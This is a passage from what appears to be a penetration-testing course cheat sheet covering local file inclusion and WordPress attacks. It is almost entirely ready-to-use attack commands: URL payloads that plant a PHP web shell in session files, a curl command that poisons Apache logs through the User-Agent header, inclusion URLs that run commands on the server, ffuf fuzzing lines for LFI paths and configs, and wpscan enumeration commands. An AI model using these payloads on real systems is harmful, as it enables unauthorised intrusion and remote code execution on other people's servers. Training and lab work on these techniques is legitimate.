session parameters | | `/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E` | Poison PHP session with web shell | | `/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id` | RCE through poisoned PHP session | | `curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'` | Poison server log | | `/index.php?language=/var/log/apache2/access.log&cmd=id` | RCE through poisoned PHP session | ## Misc | **Command** | **Description** | | --------------|-------------------| | `ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287` | Fuzz page parameters | | `ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287` | Fuzz LFI payloads | | `ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287` | Fuzz webroot path | | `ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287` | Fuzz server configurations | | [LFI Wordlists](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)| | [LFI-Jhaddix.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt) | | [Webroot path wordlist for Linux](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt) | [Webroot path wordlist for Windows](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt) | | [Server configurations wordlist for Linux](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux) | [Server configurations wordlist for Windows](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows) | ## File Inclusion Functions | **Function** | **Read Content** | **Execute** | **Remote URL** | | ----- | :-----: | :-----: | :-----: | | **PHP** | | `include()`/`include_once()` | ✅ | ✅ | ✅ | | `require()`/`require_once()` | ✅ | ✅ | ❌ | | `file_get_contents()` | ✅ | ❌ | ✅ | | `fopen()`/`file()` | ✅ | ❌ | ❌ | | **NodeJS** | | `fs.readFile()` | ✅ | ❌ | ❌ | | `fs.sendFile()` | ✅ | ❌ | ❌ | | `res.render()` | ✅ | ✅ | ❌ | | **Java** | | `include` | ✅ | ❌ | ❌ | | `import` | ✅ | ✅ | ✅ | | **.NET** | | | `@Html.Partial()` | ✅ | ❌ | ❌ | | `@Html.RemotePartial()` | ✅ | ❌ | ✅ | | `Response.WriteFile()` | ✅ | ❌ | ❌ | | `include` | ✅ | ✅ | ✅ | # HACKING WORDPRESS | **Command** | **Description** | | --------------|-------------------| |`tree -L 1`| Lists contents of current directory | |`curl -s -X GET <url>`| Makes a GET request to a webserver and receives HTML source code of requested web page | |`curl -I -X GET <url>`| Prints the response header of the GET request from the requested web page | |`curl -X POST -d <data> <url>`| Sends a POST request with data to specific webserver | |`wpscan --url <url> -e ap`| Scans specific WordPress application to enumerate plugins | |`wpscan --url <url> -e u`| Scans specific WordPress application to enumerate users | |`msfconsole`| Starts Metasploit Framework | |`html2text`| Converts redirected HTML output or files to easily readable output | |`grep <pattern>`| Filters specific pattern in files or redirected output | |`jq`| Transforms JSON input and streams of JSON entities | |`man <tool>`| Man provides you with the manpage of the specific tool | ###### tags: `Cheat Sheet`